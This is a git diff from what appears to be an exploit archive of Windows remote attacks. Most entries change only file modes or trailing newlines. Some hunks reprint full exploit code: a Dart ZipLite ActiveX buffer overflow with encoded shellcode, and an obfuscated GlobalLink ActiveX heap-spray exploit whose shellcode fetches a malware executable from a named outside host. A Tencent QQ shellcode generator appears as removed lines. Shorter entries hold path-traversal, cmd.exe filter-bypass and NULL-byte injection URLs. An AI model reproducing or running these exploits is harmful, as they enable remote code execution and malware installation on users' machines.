-../../../../../../../../boot.ini \ No newline at end of file +../../../../../../../../boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/30037.txt b/platforms/windows/remote/30037.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30038.txt b/platforms/windows/remote/30038.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30045.html b/platforms/windows/remote/30045.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30049.html b/platforms/windows/remote/30049.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30067.txt b/platforms/windows/remote/30067.txt old mode 100755 new mode 100644 index 069de8ad4..df8a66f21 --- a/platforms/windows/remote/30067.txt +++ b/platforms/windows/remote/30067.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to retrieve arbitrary files from the This issue affects rdiffWeb 0.3.5; other versions may also be affected. -http://localhost:8080/browse/?repo=b&path=..%2F..%2F..%2Fetc \ No newline at end of file +http://localhost:8080/browse/?repo=b&path=..%2F..%2F..%2Fetc \ No newline at end of file diff --git a/platforms/windows/remote/30069.html b/platforms/windows/remote/30069.html old mode 100755 new mode 100644 index 75d3c1d53..bfa1e60aa --- a/platforms/windows/remote/30069.html +++ b/platforms/windows/remote/30069.html @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary Dart ZipLite Compression ActiveX control 1.8.5.3 is vulnerable to this issue; other versions may also be affected. -<pre> <span style="font: 14pt Courier New;"><p align="center"><b>2007/05/22</b></p></span> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------------------------- <b>Dart ZipLite Compression for ActiveX (DartZipLite.dll v. 1.8.5.3) Local Buffer Overflow Exploit</b> url: http://www.dart.com/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Special thanks to <b><font color=red>rgod</font></b> that found the bug in DartZip.dll for his exploit see <a href="http://retrogod.altervista.org/ie_DartZip_bof.html">http://retrogod.altervista.org/ie_DartZip_bof.html</a> ------------------------------------------------------------------------------------------------- <object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE00D4DD' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language = 'vbscript'> Sub tryMe() buff = String(1024, "A") get_EIP = unescape("%EB%AA%3F%7E") buff1 = String(28, "A") nop = String(16, unescape("%90")) shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + buff1 + nop + shellcode + nop test.QuickZip egg, "default", True, True, "default", 1 End Sub </script> </span></span> </code></pre> \ No newline at end of file +<pre> <span style="font: 14pt Courier New;"><p align="center"><b>2007/05/22</b></p></span> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------------------------- <b>Dart ZipLite Compression for ActiveX (DartZipLite.dll v. 1.8.5.3) Local Buffer Overflow Exploit</b> url: http://www.dart.com/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Special thanks to <b><font color=red>rgod</font></b> that found the bug in DartZip.dll for his exploit see <a href="http://retrogod.altervista.org/ie_DartZip_bof.html">http://retrogod.altervista.org/ie_DartZip_bof.html</a> ------------------------------------------------------------------------------------------------- <object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE00D4DD' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language = 'vbscript'> Sub tryMe() buff = String(1024, "A") get_EIP = unescape("%EB%AA%3F%7E") buff1 = String(28, "A") nop = String(16, unescape("%90")) shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + buff1 + nop + shellcode + nop test.QuickZip egg, "default", True, True, "default", 1 End Sub </script> </span></span> </code></pre> \ No newline at end of file diff --git a/platforms/windows/remote/30100.html b/platforms/windows/remote/30100.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30144.html b/platforms/windows/remote/30144.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30169.txt b/platforms/windows/remote/30169.txt old mode 100755 new mode 100644 index f5607cae5..0cfcc4000 --- a/platforms/windows/remote/30169.txt +++ b/platforms/windows/remote/30169.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to trick victim users into encrypting potenti WinPT 1.2.0 is vulnerable; other versions may also be affected. -" <attacker@examle.com>"SSSSMMMMSSSS<victim@example2.com> "mailto:attacker@foo.org \ No newline at end of file +" <attacker@examle.com>"SSSSMMMMSSSS<victim@example2.com> "mailto:attacker@foo.org \ No newline at end of file diff --git a/platforms/windows/remote/30176.html b/platforms/windows/remote/30176.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30211.txt b/platforms/windows/remote/30211.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3022.txt b/platforms/windows/remote/3022.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30257.html b/platforms/windows/remote/30257.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30278.c b/platforms/windows/remote/30278.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30281.txt b/platforms/windows/remote/30281.txt old mode 100755 new mode 100644 index df51dcd3f..afb5fbe7f --- a/platforms/windows/remote/30281.txt +++ b/platforms/windows/remote/30281.txt @@ -4,4 +4,4 @@ Microsoft .NET Framework is prone to multiple NULL-byte injection vulnerabilitie An attacker can exploit these issues to access sensitive information that may aid in further attacks; other attacks are also possible. -http://www.example.com/[path]/somescript.asp%00 \ No newline at end of file +http://www.example.com/[path]/somescript.asp%00 \ No newline at end of file diff --git a/platforms/windows/remote/30287.txt b/platforms/windows/remote/30287.txt old mode 100755 new mode 100644 index 85d0bf028..85a394e71 --- a/platforms/windows/remote/30287.txt +++ b/platforms/windows/remote/30287.txt @@ -6,4 +6,4 @@ A successful exploit of this issue may allow an attacker to bypass the filter an http://www.example.com/scripts%c0%afcmd.exe http://www.example.com/scripts%e0%80%afcmd.exe -http://www.example.com/scripts%c1%9ccmd.exe \ No newline at end of file +http://www.example.com/scripts%c1%9ccmd.exe \ No newline at end of file diff --git a/platforms/windows/remote/30315.txt b/platforms/windows/remote/30315.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3037.php b/platforms/windows/remote/3037.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30381.txt b/platforms/windows/remote/30381.txt old mode 100755 new mode 100644 index 607cd92cd..b126b27c8 --- a/platforms/windows/remote/30381.txt +++ b/platforms/windows/remote/30381.txt @@ -28,4 +28,4 @@ nntp:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1 snews:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1 -mailto:// C:\lotus\notes\notes.exe /defini %1 \ No newline at end of file +mailto:// C:\lotus\notes\notes.exe /defini %1 \ No newline at end of file diff --git a/platforms/windows/remote/30431.html b/platforms/windows/remote/30431.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30441.html b/platforms/windows/remote/30441.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30447.html b/platforms/windows/remote/30447.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30490.txt b/platforms/windows/remote/30490.txt old mode 100755 new mode 100644 index 43351d94c..8194eed0e --- a/platforms/windows/remote/30490.txt +++ b/platforms/windows/remote/30490.txt @@ -10,4 +10,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary name=test></object> x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll") ' Call the remote DLLGetDocumentation function -alert(x.Interfaces.Item(a).Members.Item(b).HelpString) \ No newline at end of file +alert(x.Interfaces.Item(a).Members.Item(b).HelpString) \ No newline at end of file diff --git a/platforms/windows/remote/30493.js b/platforms/windows/remote/30493.js old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30537.txt b/platforms/windows/remote/30537.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3055.html b/platforms/windows/remote/3055.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30562.html b/platforms/windows/remote/30562.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30567.html b/platforms/windows/remote/30567.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3058.html b/platforms/windows/remote/3058.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30582.html b/platforms/windows/remote/30582.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30589.txt b/platforms/windows/remote/30589.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30600.html b/platforms/windows/remote/30600.html old mode 100755 new mode 100644 index 676869908..a49bd65ef --- a/platforms/windows/remote/30600.html +++ b/platforms/windows/remote/30600.html @@ -62,4 +62,4 @@ This issue affects Xunlei Web Thunder 5.6.8.344; other versions may also be affe </SCRIPT> - <body oncontextmenu= " return false " onselectstart= " return false " ondragstart= " return false " > \ No newline at end of file + <body oncontextmenu= " return false " onselectstart= " return false " ondragstart= " return false " > \ No newline at end of file diff --git a/platforms/windows/remote/30622.html b/platforms/windows/remote/30622.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30645.txt b/platforms/windows/remote/30645.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3067.txt b/platforms/windows/remote/3067.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30692.js b/platforms/windows/remote/30692.js old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30720.html b/platforms/windows/remote/30720.html old mode 100755 new mode 100644 index c3ffe4c1d..7785fdc0e --- a/platforms/windows/remote/30720.html +++ b/platforms/windows/remote/30720.html @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code within the context GlobalLink 2.7.0.8 is affected by this issue; other versions may also be vulnerable. -<body> <script>window.onerror=function(){return true;}</script> <object classid="clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69" style='display:none' id='target'></object> <SCRIPT language="javascript"> var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+ ""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" + ""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" + ""+""+""+"%u8bf3"+""+""+"%u207e"+""+""+"%ufb03"+""+""+"%u4e8b"+""+""+"%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" + ""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" + ""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" + ""+""+""+"%u33c1"+""+""+"%u66c9"+""+""+"%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" + ""+""+""+"%u008b%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" + ""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300"+""+""+"%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" + ""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" + ""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" + ""+""+""+"%u4320"+""+""+"%u4343"+""+""+"%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" + ""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" + ""+""+""+"%u7804"+""+""+"%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" + ""+""+""+"%u6adc"+""+""+"%u5300%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" + ""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251"+""+""+"%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" + ""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" + ""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" + ""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" + ""+""+""+"%u6578"+""+""+"%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" + ""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" + ""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" + ""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041"+""+""+"%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" + ""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633"+""+""+"%u2f38"+""+""+"%u3353"+""+""+"%u3836" + ""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000"); </script> <SCRIPT language="javascript"> var fsk51d2sl = "63e23c122"; var bigblock = unescape(""+""+"%u9090"+""+"%u9090"); var fsk51d2sl = "63e23c122"; var headersize = 20; var fsk51d2sl = "63e23c122"; var slackspace = headersize+shellcode.length; var fsk51d2sl = "63e23c122"; while (bigblock.length<slackspace) bigblock+=bigblock; var fsk51d2sl = "63e23c122"; fillblock = bigblock.substring(0, slackspace); var fsk51d2sl = "63e23c122"; block = bigblock.substring(0, bigblock.length-slackspace); var fsk51d2sl = "63e23c122"; while(block.length+slackspace<0x40000) block = block+block+fillblock; var fsk51d2sl = "63e23c122"; memory = new Array(); var fsk51d2sl = "63e23c122"; for (x=0; x<300; x++) memory[x] = block +shellcode; var fsk51d2sl = "63e23c122"; var buffer = ''; var fsk51d2sl = "63e23c122"; while (buffer.length < 164) buffer+="A"; var fsk51d2sl = "63e23c122"; buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer; var fsk51d2sl = "63e23c122"; ok="ok"; var fsk51d2sl = "63e23c122"; target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok ); var fsk51d2sl = "63e23c122"; </script? </body> <mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" /> /************************************************************************************************** 有漏洞的组件为:C:\Program Files\GlobalLink\Game\Share\GLChat.ocx, GlobalLink 其 CLSID:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69 下载的病毒为: http://pic.16.vg/S368/S3682.exe 超星阅读器的Exploits代码如下,这个看样子现在还是个0-Day /************************************************************************************************** \ No newline at end of file +<body> <script>window.onerror=function(){return true;}</script> <object classid="clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69" style='display:none' id='target'></object> <SCRIPT language="javascript"> var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+ ""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" + ""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" + ""+""+""+"%u8bf3"+""+""+"%u207e"+""+""+"%ufb03"+""+""+"%u4e8b"+""+""+"%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" + ""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" + ""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" + ""+""+""+"%u33c1"+""+""+"%u66c9"+""+""+"%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" + ""+""+""+"%u008b%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" + ""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300"+""+""+"%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" + ""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" + ""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" + ""+""+""+"%u4320"+""+""+"%u4343"+""+""+"%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" + ""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" + ""+""+""+"%u7804"+""+""+"%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" + ""+""+""+"%u6adc"+""+""+"%u5300%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" + ""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251"+""+""+"%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" + ""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" + ""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" + ""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" + ""+""+""+"%u6578"+""+""+"%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" + ""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" + ""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" + ""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041"+""+""+"%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" + ""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633"+""+""+"%u2f38"+""+""+"%u3353"+""+""+"%u3836" + ""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000"); </script> <SCRIPT language="javascript"> var fsk51d2sl = "63e23c122"; var bigblock = unescape(""+""+"%u9090"+""+"%u9090"); var fsk51d2sl = "63e23c122"; var headersize = 20; var fsk51d2sl = "63e23c122"; var slackspace = headersize+shellcode.length; var fsk51d2sl = "63e23c122"; while (bigblock.length<slackspace) bigblock+=bigblock; var fsk51d2sl = "63e23c122"; fillblock = bigblock.substring(0, slackspace); var fsk51d2sl = "63e23c122"; block = bigblock.substring(0, bigblock.length-slackspace); var fsk51d2sl = "63e23c122"; while(block.length+slackspace<0x40000) block = block+block+fillblock; var fsk51d2sl = "63e23c122"; memory = new Array(); var fsk51d2sl = "63e23c122"; for (x=0; x<300; x++) memory[x] = block +shellcode; var fsk51d2sl = "63e23c122"; var buffer = ''; var fsk51d2sl = "63e23c122"; while (buffer.length < 164) buffer+="A"; var fsk51d2sl = "63e23c122"; buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer; var fsk51d2sl = "63e23c122"; ok="ok"; var fsk51d2sl = "63e23c122"; target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok ); var fsk51d2sl = "63e23c122"; </script? </body> <mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" /> /************************************************************************************************** 有漏洞的组件为:C:\Program Files\GlobalLink\Game\Share\GLChat.ocx, GlobalLink 其 CLSID:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69 下载的病毒为: http://pic.16.vg/S368/S3682.exe 超星阅读器的Exploits代码如下,这个看样子现在还是个0-Day /************************************************************************************************** \ No newline at end of file diff --git a/platforms/windows/remote/30730.txt b/platforms/windows/remote/30730.txt old mode 100755 new mode 100644 index ecafae75d..c14c400fc --- a/platforms/windows/remote/30730.txt +++ b/platforms/windows/remote/30730.txt @@ -9,4 +9,4 @@ These issues affect SonicWALL SSL VPN 1.3.0.3 software as well as WebCacheCleane dim o Set o = CreateObject("MLWebCacheCleaner.WebCacheCleaner.1") -o.FileDelete("c:\bla\bla") \ No newline at end of file +o.FileDelete("c:\bla\bla") \ No newline at end of file diff --git a/platforms/windows/remote/30772.html b/platforms/windows/remote/30772.html old mode 100755 new mode 100644 index d3e8bb10f..6d1dd9317 --- a/platforms/windows/remote/30772.html +++ b/platforms/windows/remote/30772.html @@ -25,4 +25,4 @@ ComponentOne FlexGrid 7.1 Light is vulnerable; other versions may also be affect </head> <body onload="JavaScript: return Check();" /> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/30809.txt b/platforms/windows/remote/30809.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30819.c b/platforms/windows/remote/30819.c old mode 100755 new mode 100644 index 83eee8849..27f15a240 --- a/platforms/windows/remote/30819.c +++ b/platforms/windows/remote/30819.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/26613/info Tencent QQ is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data. @@ -5,225 +6,116 @@ Tencent QQ is prone to multiple stack-based buffer-overflow vulnerabilities beca Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions. These issues affect Tencent QQ 2006 and prior versions. - - #include - - #include - - #include - - FILE *fp = NULL; - - char *file = "fuck_exp1.html"; - - char *url = NULL; - - unsigned char sc[] = - - "x60x64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx70" - - "x08x81xecx00x04x00x00x8bxecx56x68x8ex4ex0execxe8" - - "xffx00x00x00x89x45x04x56x68x98xfex8ax0exe8xf1x00" - - "x00x00x89x45x08x56x68x25xb0xffxc2xe8xe3x00x00x00" - - "x89x45x0cx56x68xefxcexe0x60xe8xd5x00x00x00x89x45" - - "x10x56x68xc1x79xe5xb8xe8xc7x00x00x00x89x45x14x40" - - "x80x38xc3x75xfax89x45x18xe9x08x01x00x00x5ex89x75" - - "x24x8bx45x04x6ax01x59x8bx55x18x56xe8x8cx00x00x00" - - "x50x68x36x1ax2fx70xe8x98x00x00x00x89x45x1cx8bxc5" - - "x83xc0x50x89x45x20x68xffx00x00x00x50x8bx45x14x6a" - - "x02x59x8bx55x18xe8x62x00x00x00x03x45x20xc7x00x5c" - - "x7ex2ex65xc7x40x04x78x65x00x00xffx75x20x8bx45x0c" - - "x6ax01x59x8bx55x18xe8x41x00x00x00x6ax07x58x03x45" - - "x24x33xdbx53x53xffx75x20x50x53x8bx45x1cx6ax05x59" - - "x8bx55x18xe8x24x00x00x00x6ax00xffx75x20x8bx45x08" - - "x6ax02x59x8bx55x18xe8x11x00x00x00x81xc4x00x04x00" - - "x00x61x81xc4xdcx04x00x00x5dxc2x24x00x41x5bx52x03" - - "xe1x03xe1x03xe1x03xe1x83xecx04x5ax53x8bxdaxe2xf7" - - "x52xffxe0x55x8bxecx8bx7dx08x8bx5dx0cx56x8bx73x3c" - - "x8bx74x1ex78x03xf3x56x8bx76x20x03xf3x33xc9x49x41" - - "xadx03xc3x56x33xf6x0fxbex10x3axf2x74x08xc1xcex0d" - - "x03xf2x40xebxf1x3bxfex5ex75xe5x5ax8bxebx8bx5ax24" - - "x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5" - - "x5ex5dxc2x08x00xe8xf3xfexffxffx55x52x4cx4dx4fx4e" - - "x00"; - - char * header = - - " " - - " " - - " " - - " 